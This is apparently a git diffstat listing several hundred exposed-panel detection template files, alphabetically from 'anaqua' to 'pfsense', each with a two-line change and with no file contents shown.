http/exposed-panels/anaqua-login-panel.yaml | 2 +- http/exposed-panels/ansible-tower-exposure.yaml | 2 +- http/exposed-panels/apache-jmeter-dashboard.yaml | 2 +- http/exposed-panels/apache/apache-apisix-panel.yaml | 2 +- http/exposed-panels/apache/apache-mesos-panel.yaml | 2 +- http/exposed-panels/apache/public-tomcat-manager.yaml | 2 +- http/exposed-panels/apigee-panel.yaml | 2 +- http/exposed-panels/appsmith-web-login.yaml | 2 +- http/exposed-panels/appspace-panel.yaml | 2 +- http/exposed-panels/appsuite-panel.yaml | 2 +- http/exposed-panels/appwrite-panel.yaml | 2 +- http/exposed-panels/aqua-enterprise-panel.yaml | 2 +- http/exposed-panels/arangodb-web-Interface.yaml | 2 +- http/exposed-panels/arcgis/arcgis-panel.yaml | 2 +- http/exposed-panels/arcgis/arcgis-services.yaml | 2 +- http/exposed-panels/archibus-webcentral-panel.yaml | 2 +- http/exposed-panels/arcserve-panel.yaml | 2 +- http/exposed-panels/arris-modem-detect.yaml | 2 +- http/exposed-panels/aspcms-backend-panel.yaml | 2 +- http/exposed-panels/aspect-control-panel.yaml | 2 +- http/exposed-panels/asus-aicloud-panel.yaml | 2 +- http/exposed-panels/asus-router-panel.yaml | 2 +- http/exposed-panels/atlantis-detect.yaml | 2 +- http/exposed-panels/atlassian-bamboo-panel.yaml | 2 +- http/exposed-panels/atlassian-crowd-panel.yaml | 2 +- http/exposed-panels/audiobookshelf-panel.yaml | 2 +- http/exposed-panels/audiocodes-detect.yaml | 2 +- http/exposed-panels/authelia-panel.yaml | 2 +- http/exposed-panels/automatisch-panel.yaml | 2 +- http/exposed-panels/autoset-detect.yaml | 2 +- http/exposed-panels/avantfax-panel.yaml | 2 +- http/exposed-panels/avaya/avayaaura-cm-panel.yaml | 2 +- http/exposed-panels/avaya/avayaaura-system-manager-panel.yaml | 2 +- http/exposed-panels/aviatrix-panel.yaml | 2 +- http/exposed-panels/avigilon-panel.yaml | 2 +- http/exposed-panels/aws-ec2-autoscale.yaml | 2 +- http/exposed-panels/aws-opensearch-login.yaml | 2 +- http/exposed-panels/axel-webserver.yaml | 2 +- http/exposed-panels/axway-api-manager-panel.yaml | 2 +- http/exposed-panels/axway-securetransport-panel.yaml | 2 +- http/exposed-panels/axway-securetransport-webclient.yaml | 2 +- http/exposed-panels/axxon-client-panel.yaml | 2 +- http/exposed-panels/bedita-panel.yaml | 2 +- http/exposed-panels/beego-admin-dashboard.yaml | 2 +- http/exposed-panels/beyondtrust-priv-panel.yaml | 2 +- http/exposed-panels/bigbluebutton-login.yaml | 2 +- http/exposed-panels/bigfix-login.yaml | 2 +- http/exposed-panels/bigip-rest-panel.yaml | 2 +- http/exposed-panels/biotime-panel.yaml | 2 +- http/exposed-panels/bitdefender-gravityzone.yaml | 2 +- http/exposed-panels/bitrix-panel.yaml | 2 +- http/exposed-panels/bitwarden-vault-panel.yaml | 2 +- http/exposed-panels/black-duck-panel.yaml | 2 +- http/exposed-panels/bloofoxcms-login-panel.yaml | 2 +- http/exposed-panels/bmc/bmc-discovery-panel.yaml | 2 +- http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml | 2 +- http/exposed-panels/bolt-cms-panel.yaml | 2 +- http/exposed-panels/bookstack-panel.yaml | 2 +- http/exposed-panels/buildbot-panel.yaml | 2 +- http/exposed-panels/busybox-repository-browser.yaml | 2 +- http/exposed-panels/bynder-panel.yaml | 2 +- http/exposed-panels/c2/ares-rat-c2.yaml | 2 +- http/exposed-panels/c2/brute-ratel-c4.yaml | 2 +- http/exposed-panels/c2/caldera-c2.yaml | 2 +- http/exposed-panels/c2/covenant-c2.yaml | 2 +- http/exposed-panels/c2/deimos-c2.yaml | 2 +- http/exposed-panels/c2/empire-c2.yaml | 2 +- http/exposed-panels/c2/evilginx.yaml | 2 +- http/exposed-panels/c2/hack5-cloud-c2.yaml | 2 +- http/exposed-panels/c2/hookbot-rat.yaml | 2 +- http/exposed-panels/c2/meduza-stealer.yaml | 2 +- http/exposed-panels/c2/mystic-stealer.yaml | 2 +- http/exposed-panels/c2/mythic-c2.yaml | 2 +- http/exposed-panels/c2/nh-c2.yaml | 2 +- http/exposed-panels/c2/pupyc2.yaml | 2 +- http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml | 2 +- http/exposed-panels/c2/supershell-c2.yaml | 2 +- http/exposed-panels/c2/viper-c2.yaml | 2 +- http/exposed-panels/cacti-panel.yaml | 2 +- http/exposed-panels/cas-login.yaml | 2 +- http/exposed-panels/casaos-panel.yaml | 2 +- http/exposed-panels/casdoor-login.yaml | 2 +- http/exposed-panels/casemanager-panel.yaml | 2 +- http/exposed-panels/caton-network-manager-system.yaml | 2 +- http/exposed-panels/ccm-detect.yaml | 2 +- http/exposed-panels/centreon-panel.yaml | 2 +- http/exposed-panels/changedetection-panel.yaml | 2 +- http/exposed-panels/checkmk/checkmk-login.yaml | 2 +- http/exposed-panels/checkpoint/ssl-network-extender.yaml | 2 +- http/exposed-panels/chronos-panel.yaml | 2 +- http/exposed-panels/cisco-firepower-panel.yaml | 2 +- http/exposed-panels/cisco-unity-panel.yaml | 2 +- http/exposed-panels/cisco/cisco-anyconnect-vpn.yaml | 2 +- http/exposed-panels/cisco/cisco-asa-panel.yaml | 2 +- http/exposed-panels/cisco/cisco-edge-340.yaml | 2 +- http/exposed-panels/cisco/cisco-expressway-panel.yaml | 2 +- http/exposed-panels/cisco/cisco-finesse-login.yaml | 2 +- http/exposed-panels/cisco/cisco-integrated-login.yaml | 2 +- http/exposed-panels/cisco/cisco-ios-xe-panel.yaml | 2 +- http/exposed-panels/cisco/cisco-onprem-panel.yaml | 2 +- http/exposed-panels/cisco/cisco-prime-infrastructure.yaml | 2 +- http/exposed-panels/cisco/cisco-sd-wan.yaml | 2 +- http/exposed-panels/cisco/cisco-secure-desktop.yaml | 2 +- http/exposed-panels/cisco/cisco-systems-login.yaml | 2 +- http/exposed-panels/cisco/cisco-telepresence.yaml | 2 +- http/exposed-panels/cisco/cisco-ucs-kvm-login.yaml | 2 +- http/exposed-panels/cisco/cisco-vmanage-login.yaml | 2 +- http/exposed-panels/cisco/cisco-webvpn-detect.yaml | 2 +- http/exposed-panels/citrix-adc-gateway-detect.yaml | 2 +- http/exposed-panels/citrix-vpn-detect.yaml | 2 +- http/exposed-panels/claris-filemaker-webdirect.yaml | 2 +- http/exposed-panels/cleanweb-panel.yaml | 2 +- http/exposed-panels/clearpass-policy-manager.yaml | 2 +- http/exposed-panels/cloudpanel-login.yaml | 2 +- http/exposed-panels/cobbler-webgui.yaml | 2 +- http/exposed-panels/code-server-login.yaml | 2 +- http/exposed-panels/code42-panel.yaml | 2 +- http/exposed-panels/codemeter-webadmin-panel.yaml | 2 +- http/exposed-panels/coldfusion-administrator-login.yaml | 2 +- http/exposed-panels/compal-panel.yaml | 2 +- http/exposed-panels/compalex-panel-detect.yaml | 2 +- http/exposed-panels/completeview-web-panel.yaml | 2 +- http/exposed-panels/concrete5/concrete5-install.yaml | 2 +- http/exposed-panels/concrete5/concrete5-panel.yaml | 2 +- http/exposed-panels/connect-box-login.yaml | 2 +- http/exposed-panels/connectwise-backup-manager.yaml | 2 +- http/exposed-panels/connectwise-panel.yaml | 2 +- http/exposed-panels/contao-login-panel.yaml | 2 +- http/exposed-panels/content-central-login.yaml | 2 +- http/exposed-panels/corebos-panel.yaml | 2 +- http/exposed-panels/cortex-xsoar-login.yaml | 2 +- http/exposed-panels/couchdb-exposure.yaml | 2 +- http/exposed-panels/couchdb-fauxton.yaml | 2 +- http/exposed-panels/cpanel-api-codes.yaml | 2 +- http/exposed-panels/craftcms-admin-panel.yaml | 2 +- http/exposed-panels/craftercms-panel.yaml | 2 +- http/exposed-panels/creatio-login-panel.yaml | 2 +- http/exposed-panels/crontab-ui.yaml | 2 +- http/exposed-panels/crush-ftp-login.yaml | 2 +- http/exposed-panels/cryptobox-panel.yaml | 2 +- http/exposed-panels/cudatel-panel.yaml | 2 +- http/exposed-panels/cvent-panel-detect.yaml | 2 +- http/exposed-panels/cwp-webpanel.yaml | 2 +- http/exposed-panels/cyberchef-panel.yaml | 2 +- http/exposed-panels/cyberoam-ssl-vpn-panel.yaml | 2 +- http/exposed-panels/dahua-web-panel.yaml | 2 +- http/exposed-panels/darktrace-threat-visualizer.yaml | 2 +- http/exposed-panels/dashy-panel.yaml | 2 +- http/exposed-panels/datadog-login.yaml | 2 +- http/exposed-panels/dataease-panel.yaml | 2 +- http/exposed-panels/dataiku-panel.yaml | 2 +- http/exposed-panels/davantis-panel.yaml | 2 +- http/exposed-panels/daybyday-panel.yaml | 2 +- http/exposed-panels/dell-bmc-panel-detect.yaml | 2 +- http/exposed-panels/dell-idrac.yaml | 2 +- http/exposed-panels/dell-wyse-login.yaml | 2 +- http/exposed-panels/deluge-webui-panel.yaml | 2 +- http/exposed-panels/digital-watchdog-panel.yaml | 2 +- http/exposed-panels/digitalrebar-login.yaml | 2 +- http/exposed-panels/directadmin-login-panel.yaml | 2 +- http/exposed-panels/directum-login.yaml | 2 +- http/exposed-panels/discuz-panel.yaml | 2 +- http/exposed-panels/django-admin-panel.yaml | 2 +- http/exposed-panels/docebo-elearning-panel.yaml | 2 +- http/exposed-panels/dockge-panel.yaml | 2 +- http/exposed-panels/dokuwiki-panel.yaml | 2 +- http/exposed-panels/doris-panel.yaml | 2 +- http/exposed-panels/dotclear-panel.yaml | 2 +- http/exposed-panels/dotcms-admin-panel.yaml | 2 +- http/exposed-panels/dplus-dashboard.yaml | 2 +- http/exposed-panels/dqs-superadmin-panel.yaml | 2 +- http/exposed-panels/dradis-pro-panel.yaml | 2 +- http/exposed-panels/drawio-flowchartmaker-panel.yaml | 2 +- http/exposed-panels/druid-console-exposure.yaml | 2 +- http/exposed-panels/druid-panel.yaml | 2 +- http/exposed-panels/drupal-login.yaml | 2 +- http/exposed-panels/dxplanning-panel.yaml | 2 +- http/exposed-panels/dynatrace-panel.yaml | 2 +- http/exposed-panels/dzzoffice/dzzoffice-install.yaml | 2 +- http/exposed-panels/dzzoffice/dzzoffice-panel.yaml | 2 +- http/exposed-panels/e-mobile-panel.yaml | 2 +- http/exposed-panels/eMerge-panel.yaml | 2 +- http/exposed-panels/earcu-panel.yaml | 2 +- http/exposed-panels/easyjob-panel.yaml | 2 +- http/exposed-panels/easyvista-panel.yaml | 2 +- http/exposed-panels/eclipse-birt-panel.yaml | 2 +- http/exposed-panels/edgeos-login.yaml | 2 +- http/exposed-panels/efak-login-panel.yaml | 2 +- http/exposed-panels/eko-management-console-login.yaml | 2 +- http/exposed-panels/eko-software-update-panel.yaml | 2 +- http/exposed-panels/elemiz-network-manager.yaml | 2 +- http/exposed-panels/emby-panel.yaml | 2 +- http/exposed-panels/emessage-panel.yaml | 2 +- http/exposed-panels/emqx-panel.yaml | 2 +- http/exposed-panels/ems-webclient-panel.yaml | 2 +- http/exposed-panels/eos-http-browser.yaml | 2 +- http/exposed-panels/episerver-panel.yaml | 2 +- http/exposed-panels/epson-projector-detect.yaml | 2 +- http/exposed-panels/eset-protect-panel.yaml | 2 +- http/exposed-panels/esphome-panel.yaml | 2 +- http/exposed-panels/esxi-system.yaml | 2 +- http/exposed-panels/eventum-panel.yaml | 2 +- http/exposed-panels/evlink/evlink-panel.yaml | 2 +- http/exposed-panels/evlink/evse-web-panel.yaml | 2 +- http/exposed-panels/ewm-manager-panel.yaml | 2 +- http/exposed-panels/exagrid-manager-panel.yaml | 2 +- http/exposed-panels/exolis-engage-panel.yaml | 2 +- http/exposed-panels/exposed-webalizer.yaml | 2 +- http/exposed-panels/extron-cms-panel.yaml | 2 +- http/exposed-panels/ez-publish-panel.yaml | 2 +- http/exposed-panels/f-secure-policy-manager.yaml | 2 +- http/exposed-panels/f5-admin-interface.yaml | 2 +- http/exposed-panels/fastpanel-hosting-control-panel.yaml | 2 +- http/exposed-panels/filebrowser-login-panel.yaml | 2 +- http/exposed-panels/fiori-launchpad.yaml | 2 +- http/exposed-panels/fiorilaunchpad-logon.yaml | 2 +- http/exposed-panels/fireware-xtm-user-authentication.yaml | 2 +- http/exposed-panels/flahscookie-superadmin-panel.yaml | 2 +- http/exposed-panels/flink-exposure.yaml | 2 +- http/exposed-panels/flip-cms-panel.yaml | 2 +- http/exposed-panels/flureedb-admin-console.yaml | 2 +- http/exposed-panels/footprints-panel.yaml | 2 +- http/exposed-panels/forcepoint.yaml | 2 +- http/exposed-panels/forti/fortiadc-panel.yaml | 2 +- http/exposed-panels/fortinet/f5-next-central-manager.yaml | 2 +- http/exposed-panels/fortinet/fortiap-panel.yaml | 2 +- http/exposed-panels/fortinet/fortiauthenticator-detect.yaml | 2 +- http/exposed-panels/fortinet/forticlientems-panel.yaml | 2 +- http/exposed-panels/fortinet/fortimail-panel.yaml | 2 +- http/exposed-panels/fortinet/fortinet-fortiddos-panel.yaml | 2 +- http/exposed-panels/fortinet/fortinet-fortimanager-panel.yaml | 2 +- http/exposed-panels/fortinet/fortinet-fortinac-panel.yaml | 2 +- http/exposed-panels/fortinet/fortinet-panel.yaml | 2 +- http/exposed-panels/fortinet/fortios-management-panel.yaml | 2 +- http/exposed-panels/fortinet/fortios-panel.yaml | 2 +- http/exposed-panels/fortinet/fortisiem-panel.yaml | 2 +- http/exposed-panels/fortinet/fortitester-login-panel.yaml | 2 +- http/exposed-panels/fortinet/fortiweb-panel.yaml | 2 +- http/exposed-panels/fortinet/fortiwlm-panel.yaml | 2 +- http/exposed-panels/freeipa-panel.yaml | 2 +- http/exposed-panels/freepbx-administration-panel.yaml | 2 +- http/exposed-panels/friendica-panel.yaml | 2 +- http/exposed-panels/froxlor-management-panel.yaml | 2 +- http/exposed-panels/ftm-manager-panel.yaml | 2 +- http/exposed-panels/fuelcms-panel.yaml | 2 +- http/exposed-panels/fuji-xerox-printer-detect.yaml | 2 +- http/exposed-panels/fusionauth-admin-panel.yaml | 2 +- http/exposed-panels/gargoyle-router.yaml | 2 +- http/exposed-panels/geoserver-login-panel.yaml | 2 +- http/exposed-panels/gerapy-detect.yaml | 2 +- http/exposed-panels/gira-homeserver-homepage.yaml | 2 +- http/exposed-panels/git-repository-browser.yaml | 2 +- http/exposed-panels/gitblit-panel.yaml | 2 +- http/exposed-panels/gitea-login.yaml | 2 +- http/exposed-panels/github-enterprise-detect.yaml | 2 +- http/exposed-panels/gitlab-detect.yaml | 2 +- http/exposed-panels/globalprotect-panel.yaml | 2 +- http/exposed-panels/glowroot-panel.yaml | 2 +- http/exposed-panels/glpi-panel.yaml | 2 +- http/exposed-panels/gnu-mailman.yaml | 2 +- http/exposed-panels/goanywhere-mft-login.yaml | 2 +- http/exposed-panels/gocd-login.yaml | 2 +- http/exposed-panels/gocron-panel.yaml | 2 +- http/exposed-panels/gogs-panel.yaml | 2 +- http/exposed-panels/goodjob-dashboard.yaml | 2 +- http/exposed-panels/gotify-panel.yaml | 2 +- http/exposed-panels/gradle/gradle-enterprise-panel.yaml | 2 +- http/exposed-panels/grafana-detect.yaml | 2 +- http/exposed-panels/grails-database-admin-console.yaml | 2 +- http/exposed-panels/graylog-panel.yaml | 2 +- http/exposed-panels/greenbone-panel.yaml | 2 +- http/exposed-panels/group-ib-panel.yaml | 2 +- http/exposed-panels/gyra-master-admin.yaml | 2 +- http/exposed-panels/h2console-panel.yaml | 2 +- http/exposed-panels/hadoop-exposure.yaml | 2 +- http/exposed-panels/haivision-gateway-panel.yaml | 2 +- http/exposed-panels/haivision-media-platform-panel.yaml | 2 +- http/exposed-panels/hangfire-dashboard.yaml | 2 +- http/exposed-panels/harbor-panel.yaml | 2 +- http/exposed-panels/hashicorp-consul-agent.yaml | 2 +- http/exposed-panels/hashicorp-consul-webgui.yaml | 2 +- http/exposed-panels/hestia-panel.yaml | 2 +- http/exposed-panels/highmail-admin-panel.yaml | 2 +- http/exposed-panels/hivemanager-login-panel.yaml | 2 +- http/exposed-panels/hmc-hybris-panel.yaml | 2 +- http/exposed-panels/home-assistant-panel.yaml | 2 +- http/exposed-panels/homebridge-panel.yaml | 2 +- http/exposed-panels/homematic-panel.yaml | 2 +- http/exposed-panels/homer-panel.yaml | 2 +- http/exposed-panels/honeywell-xl-web-controller.yaml | 2 +- http/exposed-panels/horde-login-panel.yaml | 2 +- http/exposed-panels/horde-webmail-login.yaml | 2 +- http/exposed-panels/hospital-management-panel.yaml | 2 +- http/exposed-panels/hp-ilo-5.yaml | 2 +- http/exposed-panels/hp-service-manager.yaml | 2 +- http/exposed-panels/hybris-administration-console.yaml | 2 +- http/exposed-panels/hydra-dashboard.yaml | 2 +- http/exposed-panels/hypertest-dashboard.yaml | 2 +- http/exposed-panels/i-mscp-panel.yaml | 2 +- http/exposed-panels/ibm-openadmin-panel.yaml | 2 +- http/exposed-panels/ibm/ibm-dcec-panel.yaml | 2 +- http/exposed-panels/ibm/ibm-decision-server-console.yaml | 2 +- http/exposed-panels/ibm/ibm-maximo-login.yaml | 2 +- http/exposed-panels/ibm/ibm-mqseries-web-console.yaml | 2 +- http/exposed-panels/ibm/ibm-note-login.yaml | 2 +- http/exposed-panels/ibm/ibm-odm-panel.yaml | 2 +- http/exposed-panels/ibm/ibm-security-access-manager.yaml | 2 +- http/exposed-panels/ibm/ibm-websphere-admin-panel.yaml | 2 +- http/exposed-panels/ibm/ibm-websphere-panel.yaml | 2 +- http/exposed-panels/icc-pro-login.yaml | 2 +- http/exposed-panels/icewarp-panel-detect.yaml | 2 +- http/exposed-panels/icinga-web-login.yaml | 2 +- http/exposed-panels/iclock-admin-panel.yaml | 2 +- http/exposed-panels/ictprotege-login-panel.yaml | 2 +- http/exposed-panels/identity-services-engine.yaml | 2 +- http/exposed-panels/ilch-admin-panel.yaml | 2 +- http/exposed-panels/ilias-panel.yaml | 2 +- http/exposed-panels/immich-panel.yaml | 2 +- http/exposed-panels/incapptic-connect-panel.yaml | 2 +- http/exposed-panels/influxdb-panel.yaml | 2 +- http/exposed-panels/intelbras-login.yaml | 2 +- http/exposed-panels/intelbras-panel.yaml | 2 +- http/exposed-panels/intellian-aptus-panel.yaml | 2 +- http/exposed-panels/interactsoftware-interact.yaml | 2 +- http/exposed-panels/ipdiva-mediation-panel.yaml | 2 +- http/exposed-panels/isams-panel.yaml | 2 +- http/exposed-panels/issabel-login.yaml | 2 +- http/exposed-panels/itop-panel.yaml | 2 +- http/exposed-panels/ivanti-connect-secure-panel.yaml | 2 +- http/exposed-panels/ixcache-panel.yaml | 2 +- http/exposed-panels/jamf-login.yaml | 2 +- http/exposed-panels/jamf-setup-assistant.yaml | 2 +- http/exposed-panels/jaspersoft-panel.yaml | 2 +- http/exposed-panels/jboss/jboss-jbpm-admin.yaml | 2 +- http/exposed-panels/jboss/jboss-juddi.yaml | 2 +- http/exposed-panels/jboss/jboss-soa-platform.yaml | 2 +- http/exposed-panels/jboss/jmx-console.yaml | 2 +- http/exposed-panels/jboss/wildfly-panel.yaml | 2 +- http/exposed-panels/jcms-panel.yaml | 2 +- http/exposed-panels/jedox-web-panel.yaml | 2 +- http/exposed-panels/jeedom-panel.yaml | 2 +- http/exposed-panels/jellyseerr-login-panel.yaml | 2 +- http/exposed-panels/jenkins-api-panel.yaml | 2 +- http/exposed-panels/jenkins-login.yaml | 2 +- http/exposed-panels/jfrog-login.yaml | 2 +- http/exposed-panels/joomla-panel.yaml | 2 +- http/exposed-panels/jorani-panel.yaml | 2 +- http/exposed-panels/jsherp-boot-panel.yaml | 2 +- http/exposed-panels/jumpserver-panel.yaml | 2 +- http/exposed-panels/juniper-panel.yaml | 2 +- http/exposed-panels/kafka-center-login.yaml | 2 +- http/exposed-panels/kafka-consumer-monitor.yaml | 2 +- http/exposed-panels/kafka-monitoring.yaml | 2 +- http/exposed-panels/kafka-topics-ui.yaml | 2 +- http/exposed-panels/kanboard-login.yaml | 2 +- http/exposed-panels/kasm-login-panel.yaml | 2 +- http/exposed-panels/kavita-panel-detect.yaml | 2 +- http/exposed-panels/kenesto-login.yaml | 2 +- http/exposed-panels/kettle-panel.yaml | 2 +- http/exposed-panels/keycloak-admin-panel.yaml | 2 +- http/exposed-panels/kibana-panel.yaml | 2 +- http/exposed-panels/kiteworks-pcn-panel.yaml | 2 +- http/exposed-panels/kiwitcms-login.yaml | 2 +- http/exposed-panels/kkfileview-panel.yaml | 2 +- http/exposed-panels/klr300n-panel.yaml | 2 +- http/exposed-panels/kodak-network-panel.yaml | 2 +- http/exposed-panels/koel-panel.yaml | 2 +- http/exposed-panels/konga-panel.yaml | 2 +- http/exposed-panels/kopano-webapp-panel.yaml | 2 +- http/exposed-panels/kraken-cluster-monitoring.yaml | 2 +- http/exposed-panels/kubernetes-dashboard.yaml | 2 +- http/exposed-panels/kubernetes-enterprise-manager.yaml | 2 +- http/exposed-panels/kubernetes-mirantis.yaml | 2 +- http/exposed-panels/kubernetes-web-view.yaml | 2 +- http/exposed-panels/kubeview-dashboard.yaml | 2 +- http/exposed-panels/labkey-server-login.yaml | 2 +- http/exposed-panels/labtech-panel.yaml | 2 +- http/exposed-panels/lancom-router-panel.yaml | 2 +- http/exposed-panels/lansweeper-login.yaml | 2 +- http/exposed-panels/ldap-account-manager-panel.yaml | 2 +- http/exposed-panels/lenovo-fp-panel.yaml | 2 +- http/exposed-panels/librenms-login.yaml | 2 +- http/exposed-panels/librephotos-panel.yaml | 2 +- http/exposed-panels/librespeed-panel.yaml | 2 +- http/exposed-panels/liferay-portal.yaml | 2 +- http/exposed-panels/linkerd-panel.yaml | 2 +- http/exposed-panels/linshare-panel.yaml | 2 +- http/exposed-panels/livehelperchat-admin-panel.yaml | 2 +- http/exposed-panels/livezilla-login-panel.yaml | 2 +- http/exposed-panels/locklizard-webviewer-panel.yaml | 2 +- http/exposed-panels/lockself-panel.yaml | 2 +- http/exposed-panels/logitech-harmony-portal.yaml | 2 +- http/exposed-panels/lomnido-panel.yaml | 2 +- http/exposed-panels/looker-panel.yaml | 2 +- http/exposed-panels/loxone-panel.yaml | 2 +- http/exposed-panels/mach-proweb-login.yaml | 2 +- http/exposed-panels/machform-admin-panel.yaml | 2 +- http/exposed-panels/maestro-login-panel.yaml | 2 +- http/exposed-panels/mag-dashboard-panel.yaml | 2 +- http/exposed-panels/magento-admin-panel.yaml | 2 +- http/exposed-panels/magento-downloader-panel.yaml | 2 +- http/exposed-panels/magnolia-panel.yaml | 2 +- http/exposed-panels/mailhog-panel.yaml | 2 +- http/exposed-panels/mailwatch-login.yaml | 2 +- http/exposed-panels/maltrail-panel.yaml | 2 +- http/exposed-panels/mantisbt-panel.yaml | 2 +- http/exposed-panels/matomo-panel.yaml | 2 +- http/exposed-panels/memos-panel.yaml | 2 +- http/exposed-panels/meshcentral-login.yaml | 2 +- http/exposed-panels/metabase-panel.yaml | 2 +- http/exposed-panels/metasploit-panel.yaml | 2 +- http/exposed-panels/metasploit-setup-page.yaml | 2 +- http/exposed-panels/metersphere-login.yaml | 2 +- http/exposed-panels/mfiles-web-detect.yaml | 2 +- http/exposed-panels/microfocus-admin-server.yaml | 2 +- http/exposed-panels/microfocus-filr-panel.yaml | 2 +- http/exposed-panels/microfocus-lifecycle-panel.yaml | 2 +- http/exposed-panels/microfocus-vibe-panel.yaml | 2 +- http/exposed-panels/microsoft-exchange-panel.yaml | 2 +- http/exposed-panels/mikrotik/mikrotik-routeros-old.yaml | 2 +- http/exposed-panels/mikrotik/mikrotik-routeros.yaml | 2 +- http/exposed-panels/mini-start-page.yaml | 2 +- http/exposed-panels/minio-browser.yaml | 2 +- http/exposed-panels/minio-console.yaml | 2 +- http/exposed-panels/misp-panel.yaml | 2 +- http/exposed-panels/mitel-micollab-panel.yaml | 2 +- http/exposed-panels/mitel-panel-detect.yaml | 2 +- http/exposed-panels/mitric-checker-panel.yaml | 2 +- http/exposed-panels/mobile-management-panel.yaml | 2 +- http/exposed-panels/mobileiron-sentry.yaml | 2 +- http/exposed-panels/modoboa-panel.yaml | 2 +- http/exposed-panels/monitorr-panel.yaml | 2 +- http/exposed-panels/monstra-admin-panel.yaml | 2 +- http/exposed-panels/moodle-workplace-panel.yaml | 2 +- http/exposed-panels/movable-type-login.yaml | 2 +- http/exposed-panels/mpftvc-admin-panel.yaml | 2 +- http/exposed-panels/mpsec-isg1000-panel.yaml | 2 +- http/exposed-panels/ms-exchange-web-service.yaml | 2 +- http/exposed-panels/mspcontrol-login.yaml | 2 +- http/exposed-panels/mybb-forum-detect.yaml | 2 +- http/exposed-panels/mybb/mybb-forum-install.yaml | 2 +- http/exposed-panels/mylittleadmin-panel.yaml | 2 +- http/exposed-panels/mylittlebackup-panel.yaml | 2 +- http/exposed-panels/mystrom-panel.yaml | 2 +- http/exposed-panels/n8n-panel.yaml | 2 +- http/exposed-panels/nagios-panel.yaml | 2 +- http/exposed-panels/nagios-xi-panel.yaml | 2 +- http/exposed-panels/nagvis-panel.yaml | 2 +- http/exposed-panels/navicat-server-panel.yaml | 2 +- http/exposed-panels/ncentral-panel.yaml | 2 +- http/exposed-panels/nconf-panel.yaml | 2 +- http/exposed-panels/neo4j-browser.yaml | 2 +- http/exposed-panels/neobox-panel.yaml | 2 +- http/exposed-panels/neocase-hrportal-panel.yaml | 2 +- http/exposed-panels/nessus-panel.yaml | 2 +- http/exposed-panels/netdata-dashboard-detected.yaml | 2 +- http/exposed-panels/netdata-panel.yaml | 2 +- http/exposed-panels/netflix-conductor-ui.yaml | 2 +- http/exposed-panels/netscaler-aaa-login.yaml | 2 +- http/exposed-panels/netscaler-gateway.yaml | 2 +- http/exposed-panels/netsparker-panel.yaml | 2 +- http/exposed-panels/nexus-panel.yaml | 2 +- http/exposed-panels/nginx-admin-panel.yaml | 2 +- http/exposed-panels/nginx-ui-dashboard.yaml | 2 +- http/exposed-panels/nocodb-panel.yaml | 2 +- http/exposed-panels/noescape-login.yaml | 2 +- http/exposed-panels/nordex-wind-farm-portal.yaml | 2 +- http/exposed-panels/normhost-backup-server-manager.yaml | 2 +- http/exposed-panels/novnc-login-panel.yaml | 2 +- http/exposed-panels/nozomi-panel.yaml | 2 +- http/exposed-panels/np-data-cache.yaml | 2 +- http/exposed-panels/nport-web-console.yaml | 2 +- http/exposed-panels/nsq-admin-panel.yaml | 2 +- http/exposed-panels/nuxeo-platform-panel.yaml | 2 +- http/exposed-panels/nzbget-panel.yaml | 2 +- http/exposed-panels/o2-easy-panel.yaml | 2 +- http/exposed-panels/ocomon-panel.yaml | 2 +- http/exposed-panels/ocs-inventory-login.yaml | 2 +- http/exposed-panels/octoprint-login.yaml | 2 +- http/exposed-panels/odoo-database-manager.yaml | 2 +- http/exposed-panels/odoo-panel.yaml | 2 +- http/exposed-panels/office-webapps-panel.yaml | 2 +- http/exposed-panels/officekeeper-admin-login.yaml | 2 +- http/exposed-panels/oipm-detect.yaml | 2 +- http/exposed-panels/olt-web-interface.yaml | 2 +- http/exposed-panels/omniampx-panel.yaml | 2 +- http/exposed-panels/onlyoffice-login-panel.yaml | 2 +- http/exposed-panels/open-stack-dashboard-login.yaml | 2 +- http/exposed-panels/open-virtualization-manager-panel.yaml | 2 +- http/exposed-panels/openam-panel.yaml | 2 +- http/exposed-panels/openbullet2-panel.yaml | 2 +- http/exposed-panels/opencart-panel.yaml | 2 +- http/exposed-panels/opencats-panel.yaml | 2 +- http/exposed-panels/openemr-detect.yaml | 2 +- http/exposed-panels/openerp-database.yaml | 2 +- http/exposed-panels/openfire-admin-panel.yaml | 2 +- http/exposed-panels/opengear-panel.yaml | 2 +- http/exposed-panels/opennebula-panel.yaml | 2 +- http/exposed-panels/opennms-web-console.yaml | 2 +- http/exposed-panels/opensis-panel.yaml | 2 +- http/exposed-panels/opentouch-multimediaservices-panel.yaml | 2 +- http/exposed-panels/openvas-panel.yaml | 2 +- http/exposed-panels/openvpn-admin.yaml | 2 +- http/exposed-panels/openvpn-connect.yaml | 2 +- http/exposed-panels/openvpn-router-management.yaml | 2 +- http/exposed-panels/openvz-web-login.yaml | 2 +- http/exposed-panels/openwebui-panel.yaml | 2 +- http/exposed-panels/openwrt-login.yaml | 2 +- http/exposed-panels/openwrt/openwrt-luci-panel.yaml | 2 +- http/exposed-panels/openx-panel.yaml | 2 +- http/exposed-panels/opinio-panel.yaml | 2 +- http/exposed-panels/oracle-access-management.yaml | 2 +- http/exposed-panels/oracle-business-control.yaml | 2 +- http/exposed-panels/oracle-business-intelligence.yaml | 2 +- http/exposed-panels/oracle-ebusiness-panel.yaml | 2 +- http/exposed-panels/oracle-enterprise-manager-login.yaml | 2 +- http/exposed-panels/oracle-opera-login.yaml | 2 +- http/exposed-panels/oracle-people-enterprise.yaml | 2 +- http/exposed-panels/oracle-peoplesoft-panel.yaml | 2 +- http/exposed-panels/orchid-vms-panel.yaml | 2 +- http/exposed-panels/osticket-panel.yaml | 2 +- http/exposed-panels/osticket/osticket-install.yaml | 2 +- http/exposed-panels/ourmgmt3-panel.yaml | 2 +- http/exposed-panels/outsystems-servicecenter-panel.yaml | 2 +- http/exposed-panels/overseerr-panel.yaml | 2 +- http/exposed-panels/pahtool-panel.yaml | 2 +- http/exposed-panels/pairdrop-panel.yaml | 2 +- http/exposed-panels/panabit-panel.yaml | 2 +- http/exposed-panels/pandora-fms-console.yaml | 2 +- http/exposed-panels/papercut-ng-panel.yaml | 2 +- http/exposed-panels/parallels/parallels-hsphere-detect.yaml | 2 +- http/exposed-panels/parse-dashboard.yaml | 2 +- http/exposed-panels/passbolt-panel.yaml | 2 +- http/exposed-panels/payroll-management-system-panel.yaml | 2 +- http/exposed-panels/pdi-device-page.yaml | 2 +- http/exposed-panels/pega-web-panel.yaml | 2 +- http/exposed-panels/pentaho-panel.yaml | 2 +- http/exposed-panels/persis-panel.yaml | 2 +- http/exposed-panels/pfsense-login.yaml | 2 